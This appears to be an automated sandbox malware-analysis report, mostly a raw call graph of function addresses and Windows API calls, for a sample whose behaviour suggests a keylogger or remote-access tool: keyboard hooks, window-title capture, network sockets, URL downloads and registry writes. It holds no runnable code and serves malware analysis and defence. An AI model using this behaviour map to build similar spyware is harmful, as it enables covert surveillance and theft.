API calls 48524->48525 48526 401fbd 48525->48526 48526->48520 48528 40a127 48527->48528 48529 413549 3 API calls 48528->48529 48530 40a12e 48529->48530 48531 40a142 48530->48531 48532 40a15c 48530->48532 48533 409e9b 48531->48533 48534 40a147 48531->48534 48548 40905c 48532->48548 48533->47534 48536 40905c 28 API calls 48534->48536 48538 40a155 48536->48538 48576 40a22d 29 API calls 48538->48576 48541 40a15a 48541->48533 48542->48050 48724 403222 48543->48724 48545 403022 48728 403262 48545->48728 48549 409072 48548->48549 48550 402252 11 API calls 48549->48550 48551 40908c 48550->48551 48577 404267 48551->48577 48553 40909a 48554 40a179 48553->48554 48589 40b8ec 48554->48589 48557 40a1a2 48560 402093 28 API calls 48557->48560 48558 40a1ca 48559 402093 28 API calls 48558->48559 48562 40a1d5 48559->48562 48561 40a1ac 48560->48561 48563 41bc5e 28 API calls 48561->48563 48564 402093 28 API calls 48562->48564 48565 40a1ba 48563->48565 48566 40a1e4 48564->48566 48593 40b164 31 API calls new 48565->48593 48568 41b4ef 80 API calls 48566->48568 48570 40a1e9 CreateThread 48568->48570 48569 40a1c1 48571 401fd8 11 API calls 48569->48571 48572 40a210 CreateThread 48570->48572 48573 40a204 CreateThread 48570->48573 48601 40a27d 48570->48601 48571->48558 48574 401f09 11 API calls 48572->48574 48598 40a289 48572->48598 48573->48572 48595 40a267 48573->48595 48575 40a224 48574->48575 48575->48533 48576->48541 48723 40a273 163 API calls 48576->48723 48578 402888 22 API calls 48577->48578 48579 40427b 48578->48579 48580 404290 48579->48580 48581 4042a5 48579->48581 48587 4042df 22 API calls 48580->48587 48582 4027e6 28 API calls 48581->48582 48584 4042a3 48582->48584 48584->48553 48585 404299 48588 402c48 22 API calls 48585->48588 48587->48585 48588->48584 48590 40b8f5 48589->48590 48591 40a197 48589->48591 48594 40b96c 28 API calls 48590->48594 48591->48557 48591->48558 48593->48569 48594->48591 48604 40a2b8 48595->48604 48634 40acd6 48598->48634 48676 40a726 48601->48676 48605 40a2d1 GetModuleHandleA SetWindowsHookExA 48604->48605 48606 40a333 GetMessageA 48604->48606 48605->48606 48608 40a2ed GetLastError 48605->48608 48607 40a345 TranslateMessage DispatchMessageA 48606->48607 48618 40a270 48606->48618 48607->48606 48607->48618 48619 41bb8e 48608->48619 48625 441e81 48619->48625 48622 402093 28 API calls 48623 40a2fe 48622->48623 48624 4052fd 28 API calls 48623->48624 48626 441e8d 48625->48626 48629 441c7d 48626->48629 48628 41bbb2 48628->48622 48630 441c94 48629->48630 48632 441ccb _Atexit 48630->48632 48633 4405dd 20 API calls _Atexit 48630->48633 48632->48628 48633->48632 48663 40ace4 48634->48663 48635 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 48638 40b904 28 API calls 48635->48638 48636 40a292 48638->48663 48642 41bae6 GetTickCount 48642->48663 48643 40ad84 GetWindowTextW 48643->48663 48645 40aedc 48647 401f09 11 API calls 48645->48647 48646 40b8ec 28 API calls 48646->48663 48647->48636 48648 40ae49 Sleep 48648->48663 48649 441e81 20 API calls 48649->48663 48651 402093 28 API calls 48651->48663 48652 40add1 48655 40905c 28 API calls 48652->48655 48652->48663 48672 40b164 31 API calls new 48652->48672 48655->48652 48656 403014 28 API calls 48656->48663 48657 406383 28 API calls 48657->48663 48659 40a636 12 API calls 48659->48663 48660 41bc5e 28 API calls 48660->48663 48661 401f09 11 API calls 48661->48663 48662 401fd8 11 API calls 48662->48663 48663->48635 48663->48636 48663->48642 48663->48643 48663->48645 48663->48646 48663->48648 48663->48649 48663->48651 48663->48652 48663->48656 48663->48657 48663->48659 48663->48660 48663->48661 48663->48662 48664 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48663->48664 48665 401f86 48663->48665 48669 434770 23 API calls __onexit 48663->48669 48670 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48663->48670 48671 409044 28 API calls 48663->48671 48673 40b97c 28 API calls 48663->48673 48674 40b748 40 API calls 2 library calls 48663->48674 48675 4052fd 28 API calls 48663->48675 48666 401f8e 48665->48666 48667 402252 11 API calls 48666->48667 48668 401f99 48667->48668 48668->48663 48669->48663 48670->48663 48671->48663 48672->48652 48673->48663 48674->48663 48677 40a73b Sleep 48676->48677 48697 40a675 48677->48697 48679 40a286 48680 40a77b CreateDirectoryW 48684 40a74d 48680->48684 48681 40a78c GetFileAttributesW 48681->48684 48682 40a7a3 SetFileAttributesW 48682->48684 48684->48677 48684->48679 48684->48681 48684->48682 48686 401e65 22 API calls 48684->48686 48695 40a76f 48684->48695 48710 41c3f1 48684->48710 48685 40a81d PathFileExistsW 48685->48695 48686->48684 48687 4020df 11 API calls 48687->48695 48688 4020b7 28 API calls 48688->48695 48690 40a926 SetFileAttributesW 48690->48684 48691 406dd8 28 API calls 48691->48695 48692 401fe2 28 API calls 48692->48695 48693 401fd8 11 API calls 48693->48695 48695->48680 48695->48685 48695->48687 48695->48688 48695->48690 48695->48691 48695->48692 48695->48693 48696 401fd8 11 API calls 48695->48696 48720 41c485 32 API calls 48695->48720 48721 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48695->48721 48696->48684 48698 40a722 48697->48698 48700 40a68b 48697->48700 48698->48684 48699 40a6aa CreateFileW 48699->48700 48701 40a6b8 GetFileSize 48699->48701 48700->48699 48702 40a6ed CloseHandle 48700->48702 48703 40a6ff 48700->48703 48704 40a6e2 Sleep 48700->48704 48705 40a6db 48700->48705 48701->48700 48701->48702 48702->48700 48703->48698 48707 40905c 28 API calls 48703->48707 48704->48702 48722 40b0dc 84 API calls 48705->48722 48708 40a71b 48707->48708 48709 40a179 124 API calls 48708->48709 48709->48698 48711 41c404 CreateFileW 48710->48711 48713 41c441 48711->48713 48714 41c43d 48711->48714 48715 41c461 WriteFile 48713->48715 48716 41c448 SetFilePointer 48713->48716 48714->48684 48718 41c474 48715->48718 48719 41c476 CloseHandle 48715->48719 48716->48715 48717 41c458 CloseHandle 48716->48717 48717->48714 48718->48719 48719->48714 48720->48695 48721->48695 48722->48704 48725 40322e 48724->48725 48734 403618 48725->48734 48727 40323b 48727->48545 48729 40326e 48728->48729 48730 402252 11 API calls 48729->48730 48731 403288 48730->48731 48732 402336 11 API calls 48731->48732 48733 403031 48732->48733 48733->48055 48735 403626 48734->48735 48736 403644 48735->48736 48737 40362c 48735->48737 48739 40369e 48736->48739 48741 40365c 48736->48741 48745 4036a6 28 API calls 48737->48745 48746 4028a4 22 API calls 48739->48746 48743 4027e6 28 API calls 48741->48743 48744 403642 48741->48744 48743->48744 48744->48727 48745->48744 48748 404186 48747->48748 48749 402252 11 API calls 48748->48749 48750 404191 48749->48750 48758 4041bc 48750->48758 48753 4042fc 48769 404353 48753->48769 48755 40430a 48756 403262 11 API calls 48755->48756 48757 404319 48756->48757 48757->48064 48759 4041c8 48758->48759 48762 4041d9 48759->48762 48761 40419c 48761->48753 48763 4041e9 48762->48763 48764 404206 48763->48764 48765 4041ef 48763->48765 48766 4027e6 28 API calls 48764->48766 48767 404267 28 API calls 48765->48767 48768 404204 48766->48768 48767->48768 48768->48761 48770 40435f 48769->48770 48773 404371 48770->48773 48772 40436d 48772->48755 48774 40437f 48773->48774 48775 404385 48774->48775 48776 40439e 48774->48776 48839 4034e6 28 API calls 48775->48839 48777 402888 22 API calls 48776->48777 48778 4043a6 48777->48778 48780 404419 48778->48780 48781 4043bf 48778->48781 48840 4028a4 22 API calls 48780->48840 48784 4027e6 28 API calls 48781->48784 48792 40439c 48781->48792 48784->48792 48792->48772 48839->48792 48847 43aa9a 48841->48847 48845 4138b9 48844->48845 48846 41388f RegSetValueExA RegCloseKey 48844->48846 48845->48083 48846->48845 48850 43aa1b 48847->48850 48849 40170d 48849->48081 48851 43aa2a 48850->48851 48852 43aa3e 48850->48852 48863 4405dd 20 API calls _Atexit 48851->48863 48855 43aa2f __alldvrm _Atexit 48852->48855 48856 448957 48852->48856 48855->48849 48857 4484ca _Atexit 5 API calls 48856->48857 48858 44897e 48857->48858 48859 448996 GetSystemTimeAsFileTime 48858->48859 48860 44898a 48858->48860 48859->48860 48861 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 48860->48861 48862 4489a7 48861->48862 48862->48855 48863->48855 48867 41b8f9 _Yarn ___scrt_get_show_window_mode 48864->48867 48865 402093 28 API calls 48866 414f49 48865->48866 48866->48089 48867->48865 48868->48106 48870 414f02 getaddrinfo WSASetLastError 48869->48870 48871 414ef8 48869->48871 48870->48157 49004 414d86 48871->49004 48875 404846 socket 48874->48875 48876 404839 48874->48876 48877 404860 CreateEventW 48875->48877 48878 404842 48875->48878 49043 40489e WSAStartup 48876->49043 48877->48157 48878->48157 48880 40483e 48880->48875 48880->48878 48882 404f65 48881->48882 48883 404fea 48881->48883 48884 404f6e 48882->48884 48885 404fc0 CreateEventA CreateThread 48882->48885 48886 404f7d GetLocalTime 48882->48886 48883->48157 48884->48885 48885->48883 49045 405150 48885->49045 48887 41bb8e 28 API calls 48886->48887 48888 404f91 48887->48888 49044 4052fd 28 API calls 48888->49044 48897 404a1b 48896->48897 48898 4048ee 48896->48898 48899 40497e 48897->48899 48900 404a21 WSAGetLastError 48897->48900 48898->48899 48901 404923 48898->48901 48904 40531e 28 API calls 48898->48904 48899->48157 48900->48899 48902 404a31 48900->48902 49049 420c60 27 API calls 48901->49049 48905 404932 48902->48905 48906 404a36 48902->48906 48908 40490f 48904->48908 48911 402093 28 API calls 48905->48911 49054 41cae1 30 API calls 48906->49054 48907 40492b 48907->48905 48910 404941 48907->48910 48912 402093 28 API calls 48908->48912 48921 404950 48910->48921 48922 404987 48910->48922 48914 404a80 48911->48914 48915 40491e 48912->48915 48913 404a40 49055 4052fd 28 API calls 48913->49055 48918 402093 28 API calls 48914->48918 48919 41b4ef 80 API calls 48915->48919 48923 404a8f 48918->48923 48919->48901 48926 402093 28 API calls 48921->48926 49051 421a40 54 API calls 48922->49051 48927 41b4ef 80 API calls 48923->48927 48930 40495f 48926->48930 48927->48899 48929 40498f 48932 4049c4 48929->48932 48933 404994 48929->48933 48934 402093 28 API calls 48930->48934 49053 420e06 28 API calls 48932->49053 48936 402093 28 API calls 48933->48936 48937 40496e 48934->48937 48939 4049a3 48936->48939 48940 41b4ef 80 API calls 48937->48940 48943 402093 28 API calls 48939->48943 48944 404973 48940->48944 48941 4049cc 48942 4049f9 CreateEventW CreateEventW 48941->48942 48945 402093 28 API calls 48941->48945 48942->48899 48946 4049b2 48943->48946 49050 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48944->49050 48947 4049e2 48945->48947 48948 41b4ef 80 API calls 48946->48948 48950 402093 28 API calls 48947->48950 48951 4049b7 48948->48951 48952 4049f1 48950->48952 49052 4210b2 52 API calls 48951->49052 48954 41b4ef 80 API calls 48952->48954 48955 4049f6 48954->48955 48955->48942 49056 41b7b6 GlobalMemoryStatusEx 48956->49056 48958 41b7f5 48958->48157 49057 414580 48959->49057 48963 40dda5 48962->48963 48964 4134ff 3 API calls 48963->48964 48966 40ddac 48964->48966 48965 40ddc4 48965->48157 48966->48965 48967 413549 3 API calls 48966->48967 48967->48965 48968->48157 48969->48157 48971 41bafc GetTickCount 48970->48971 48971->48169 48973 436e90 ___scrt_get_show_window_mode 48972->48973 48974 41bab5 GetForegroundWindow GetWindowTextW 48973->48974 48975 40417e 28 API calls 48974->48975 48976 41badf 48975->48976 48976->48169 48977->48169 48978->48169 48980 4020df 11 API calls 48979->48980 48981 404c27 48980->48981 48982 4020df 11 API calls 48981->48982 48994 404c30 48982->48994 48983 43bd51 new 21 API calls 48983->48994 48985 404c96 48987 404ca1 48985->48987 48985->48994 48986 4020b7 28 API calls 48986->48994 49099 404e26 99 API calls 48987->49099 48988 401fe2 28 API calls 48988->48994 48990 404ca8 48992 401fd8 11 API calls 48990->48992 48991 401fd8 11 API calls 48991->48994 48993 404cb1 48992->48993 48995 401fd8 11 API calls 48993->48995 48994->48983 48994->48985 48994->48986 48994->48988 48994->48991 49086 404cc3 48994->49086 49098 404b96 57 API calls 48994->49098 48996 404cba 48995->48996 48996->48136 48998->48157 48999->48136 49001->48169 49002->48136 49003->48136 49005 414dc8 GetSystemDirectoryA 49004->49005 49023 414ecf 49004->49023 49006 414de3 49005->49006 49005->49023 49025 441a3e 49006->49025 49008 414dff 49032 441a98 49008->49032 49010 414e0f LoadLibraryA 49011 414e31 GetProcAddress 49010->49011 49012 414e42 49010->49012 49011->49012 49013 414e3d FreeLibrary 49011->49013 49014 441a3e ___std_exception_copy 20 API calls 49012->49014 49015 414e93 49012->49015 49013->49012 49016 414e5e 49014->49016 49017 414e99 GetProcAddress 49015->49017 49021 414eb2 49015->49021 49015->49023 49018 441a98 20 API calls 49016->49018 49017->49015 49019 414eb4 FreeLibrary 49017->49019 49020 414e6e LoadLibraryA 49018->49020 49019->49021 49022 414e82 GetProcAddress 49020->49022 49020->49023 49021->49023 49022->49015 49024 414e8e FreeLibrary 49022->49024 49023->48870 49024->49015 49026 441a59 49025->49026 49027 441a4b 49025->49027 49039 4405dd 20 API calls _Atexit 49026->49039 49027->49026 49030 441a70 49027->49030 49029 441a61 _Atexit 49029->49008 49030->49029 49040 4405dd 20 API calls _Atexit 49030->49040 49033 441ab4 49032->49033 49035 441aa6 49032->49035 49041 4405dd 20 API calls _Atexit 49033->49041 49035->49033 49036 441add 49035->49036 49038 441abc _Atexit 49036->49038 49042 4405dd 20 API calls _Atexit 49036->49042 49038->49010 49039->49029 49040->49029 49041->49038 49042->49038 49043->48880 49048 40515c 102 API calls 49045->49048 49047 405159 49048->49047 49049->48907 49050->48899 49051->48929 49052->48944 49053->48941 49054->48913 49056->48958 49060 414553 49057->49060 49061 414568 ___scrt_initialize_default_local_stdio_options 49060->49061 49064 43f79d 49061->49064 49067 43c4f0 49064->49067 49068 43c530 49067->49068 49069 43c518 49067->49069 49068->49069 49071 43c538 49068->49071 49082 4405dd 20 API calls _Atexit 49069->49082 49072 43a7b7 __fassign 36 API calls 49071->49072 49073 43c548 49072->49073 49083 43cc76 20 API calls 2 library calls 49073->49083 49074 43c51d _Atexit 49076 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49074->49076 49078 414576 49076->49078 49077 43c5c0 49084 43d2e4 51 API calls 3 library calls 49077->49084 49078->48157 49081 43c5cb 49085 43cce0 20 API calls _free 49081->49085 49082->49074 49083->49077 49084->49081 49085->49074 49087 4020df 11 API calls 49086->49087 49096 404cde 49087->49096 49088 404e13 49089 401fd8 11 API calls 49088->49089 49090 404e1c 49089->49090 49090->48985 49091 4041a2 28 API calls 49091->49096 49092 401fe2 28 API calls 49092->49096 49093 401fc0 28 API calls 49095 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 49093->49095 49094 4020f6 28 API calls 49094->49096 49095->49096 49100 415aea 49095->49100 49096->49088 49096->49091 49096->49092 49096->49093 49096->49094 49097 401fd8 11 API calls 49096->49097 49097->49096 49098->48994 49099->48990 49101 4020f6 28 API calls 49100->49101 49102 415b0c SetEvent 49101->49102 49103 415b21 49102->49103 49104 4041a2 28 API calls 49103->49104 49105 415b3b 49104->49105 49106 4020f6 28 API calls 49105->49106 49107 415b4b 49106->49107 49108 4020f6 28 API calls 49107->49108 49109 415b5d 49108->49109 49110 41be1b 28 API calls 49109->49110 49111 415b66 49110->49111 49112 417089 49111->49112 49113 415b86 GetTickCount 49111->49113 49114 415d2f 49111->49114 49115 401e8d 11 API calls 49112->49115 49116 41bb8e 28 API calls 49113->49116 49114->49112 49178 415ce5 49114->49178 49117 417092 49115->49117 49118 415b97 49116->49118 49120 401fd8 11 API calls 49117->49120 49121 41bae6 GetTickCount 49118->49121 49122 41709e 49120->49122 49123 415ba3 49121->49123 49124 401fd8 11 API calls 49122->49124 49125 41bb8e 28 API calls 49123->49125 49126 4170aa 49124->49126 49127 415bae 49125->49127 49128 41ba96 30 API calls 49127->49128 49129 415bbc 49128->49129 49179 41bd1e 28 API calls 49129->49179 49131 415bca 49132 401e65 22 API calls 49131->49132 49133 415bd8 49132->49133 49180 402f31 28 API calls 49133->49180 49135 415be6 49181 402ea1 28 API calls 49135->49181 49137 415bf5 49138 402f10 28 API calls 49137->49138 49139 415c04 49138->49139 49182 402ea1 28 API calls 49139->49182 49141 415c13 49142 402f10 28 API calls 49141->49142 49143 415c1f 49142->49143 49183 402ea1 28 API calls 49143->49183 49145 415c29 49184 404aa1 61 API calls _Yarn 49145->49184 49147 415c38 49148 401fd8 11 API calls 49147->49148 49149 415c41 49148->49149 49150 401fd8 11 API calls 49149->49150 49151 415c4d 49150->49151 49152 401fd8 11 API calls 49151->49152 49153 415c59 49152->49153 49154 401fd8 11 API calls 49153->49154 49155 415c65 49154->49155 49156 401fd8 11 API calls 49155->49156 49157 415c71 49156->49157 49158 401fd8 11 API calls 49157->49158 49159 415c7d 49158->49159 49160 401f09 11 API calls 49159->49160 49161 415c86 49160->49161 49162 401fd8 11 API calls 49161->49162 49163 415c8f 49162->49163 49164 401fd8 11 API calls 49163->49164 49165 415c98 49164->49165 49166 401e65 22 API calls 49165->49166 49167 415ca3 49166->49167 49168 43baac _strftime 40 API calls 49167->49168 49169 415cb0 49168->49169 49170 415cb5 49169->49170 49171 415cdb 49169->49171 49173 415cc3 49170->49173 49174 415cce 49170->49174 49172 401e65 22 API calls 49171->49172 49172->49178 49185 404ff4 82 API calls 49173->49185 49176 404f51 105 API calls 49174->49176 49177 415cc9 49176->49177 49177->49112 49178->49112 49186 4050e4 84 API calls 49178->49186 49179->49131 49180->49135 49181->49137 49182->49141 49183->49145 49184->49147 49185->49177 49186->49177 49188->48209 49189->48234 49190->48233 49191->48223 49192->48227 49193->48235 49194->48266 49199 40f7c2 49197->49199 49198 413549 3 API calls 49198->49199 49199->49198 49200 40f866 49199->49200 49203 40f856 Sleep 49199->49203 49219 40f7f4 49199->49219 49202 40905c 28 API calls 49200->49202 49201 40905c 28 API calls 49201->49219 49205 40f871 49202->49205 49203->49199 49204 41bc5e 28 API calls 49204->49219 49207 41bc5e 28 API calls 49205->49207 49208 40f87d 49207->49208 49232 413814 14 API calls 49208->49232 49211 401f09 11 API calls 49211->49219 49212 40f890 49213 401f09 11 API calls 49212->49213 49215 40f89c 49213->49215 49214 402093 28 API calls 49214->49219 49216 402093 28 API calls 49215->49216 49217 40f8ad 49216->49217 49220 41376f 14 API calls 49217->49220 49218 41376f 14 API calls 49218->49219 49219->49201 49219->49203 49219->49204 49219->49211 49219->49214 49219->49218 49230 40d096 112 API calls ___scrt_get_show_window_mode 49219->49230 49231 413814 14 API calls 49219->49231 49221 40f8c0 49220->49221 49233 412850 TerminateProcess WaitForSingleObject 49221->49233 49223 40f8c8 ExitProcess 49234 4127ee 62 API calls 49228->49234 49231->49219 49232->49212 49233->49223 49235 4269e6 49236 4269fb 49235->49236 49248 426a8d 49235->49248 49237 426a48 49236->49237 49238 426b44 49236->49238 49239 426abd 49236->49239 49240 426b1d 49236->49240 49243 426af2 49236->49243 49246 426a7d 49236->49246 49236->49248 49263 424edd 49 API calls _Yarn 49236->49263 49237->49246 49237->49248 49264 41fb6c 52 API calls 49237->49264 49238->49248 49268 426155 28 API calls 49238->49268 49239->49243 49239->49248 49266 41fb6c 52 API calls 49239->49266 49240->49238 49240->49248 49251 425ae1 49240->49251 49243->49240 49267 4256f0 21 API calls 49243->49267 49246->49239 49246->49248 49265 424edd 49 API calls _Yarn 49246->49265 49252 425b00 ___scrt_get_show_window_mode 49251->49252 49254 425b0f 49252->49254 49257 425b34 49252->49257 49269 41ebbb 21 API calls 49252->49269 49254->49257 49262 425b14 49254->49262 49270 4205d8 46 API calls 49254->49270 49257->49238 49258 425b1d 49258->49257 49273 424d05 21 API calls 2 library calls 49258->49273 49260 425bb7 49260->49257 49271 432ec4 21 API calls new 49260->49271 49262->49257 49262->49258 49272 41da5f 49 API calls 49262->49272 49263->49237 49264->49237 49265->49239 49266->49239 49267->49240 49268->49248 49269->49254 49270->49260 49271->49262 49272->49258 49273->49257 49274 434875 49279 434b47 SetUnhandledExceptionFilter 49274->49279 49276 43487a pre_c_initialization 49280 44554b 20 API calls 2 library calls 49276->49280 49278 434885 49279->49276 49280->49278 49281 415d06 49296 41b380 49281->49296 49283 415d0f 49284 4020f6 28 API calls 49283->49284 49285 415d1e 49284->49285 49307 404aa1 61 API calls _Yarn 49285->49307 49287 415d2a 49288 417089 49287->49288 49289 401fd8 11 API calls 49287->49289 49290 401e8d 11 API calls 49288->49290 49289->49288 49291 417092 49290->49291 49292 401fd8 11 API calls 49291->49292 49293 41709e 49292->49293 49294 401fd8 11 API calls 49293->49294 49295 4170aa 49294->49295 49297 4020df 11 API calls 49296->49297 49298 41b38e 49297->49298 49299 43bd51 new 21 API calls 49298->49299 49300 41b39e InternetOpenW InternetOpenUrlW 49299->49300 49301 41b3c5 InternetReadFile 49300->49301 49305 41b3e8 49301->49305 49302 4020b7 28 API calls 49302->49305 49303 41b415 InternetCloseHandle InternetCloseHandle 49304 41b427 49303->49304 49304->49283 49305->49301 49305->49302 49305->49303 49306 401fd8 11 API calls 49305->49306 49306->49305 49307->49287 49308 426c4b 49313 426cc8 send 49308->49313 49314 44831e 49322 448710 49314->49322 49317 448332 49319 44833a 49320 448347 49319->49320 49330 44834a 11 API calls 49319->49330 49323 4484ca _Atexit 5 API calls 49322->49323 49324 448737 49323->49324 49325 44874f TlsAlloc 49324->49325 49326 448740 49324->49326 49325->49326 49327 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49326->49327 49328 448328 49327->49328 49328->49317 49329 448299 20 API calls 3 library calls 49328->49329 49329->49319 49330->49317 49331 43be58 49334 43be64 _swprintf ___scrt_is_nonwritable_in_current_image 49331->49334 49332 43be72 49347 4405dd 20 API calls _Atexit 49332->49347 49334->49332 49335 43be9c 49334->49335 49342 445888 EnterCriticalSection 49335->49342 49337 43be77 ___scrt_is_nonwritable_in_current_image _Atexit 49338 43bea7 49343 43bf48 49338->49343 49342->49338 49344 43bf56 49343->49344 49346 43beb2 49344->49346 49349 44976c 37 API calls 2 library calls 49344->49349 49348 43becf LeaveCriticalSection std::_Lockit::~_Lockit 49346->49348 49347->49337 49348->49337 49349->49344 49350 41dfbd 49351 41dfd2 _Yarn ___scrt_get_show_window_mode 49350->49351 49363 41e1d5 49351->49363 49369 432ec4 21 API calls new 49351->49369 49354 41e1e6 49357 41e189 49354->49357 49365 432ec4 21 API calls new 49354->49365 49356 41e182 ___scrt_get_show_window_mode 49356->49357 49370 432ec4 21 API calls new 49356->49370 49359 41e21f ___scrt_get_show_window_mode 49359->49357 49366 43354a 49359->49366 49361 41e1af ___scrt_get_show_window_mode 49361->49357 49371 432ec4 21 API calls new 49361->49371 49363->49357 49364 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49363->49364 49364->49354 49365->49359 49372 433469 49366->49372 49368 433552 49368->49357 49369->49356 49370->49361 49371->49363 49373 433482 49372->49373 49374 433478 49372->49374 49373->49374 49378 432ec4 21 API calls new 49373->49378 49374->49368 49376 4334a3 49376->49374 49379 433837 CryptAcquireContextA 49376->49379 49378->49376 49380 433858 CryptGenRandom 49379->49380 49381 433853 49379->49381 49380->49381 49382 43386d CryptReleaseContext 49380->49382 49381->49374 49382->49381 49383 40165e 49384 401666 49383->49384 49386 401669 49383->49386 49385 4016a8 49387 4344ea new 22 API calls 49385->49387 49386->49385 49388 401696 49386->49388 49389 40169c 49387->49389 49390 4344ea new 22 API calls 49388->49390 49390->49389 49391 426bdc 49397 426cb1 recv 49391->49397

                                                        Executed Functions

                                                        Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                        • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                        • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                        • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                        • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                        • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad$HandleModule
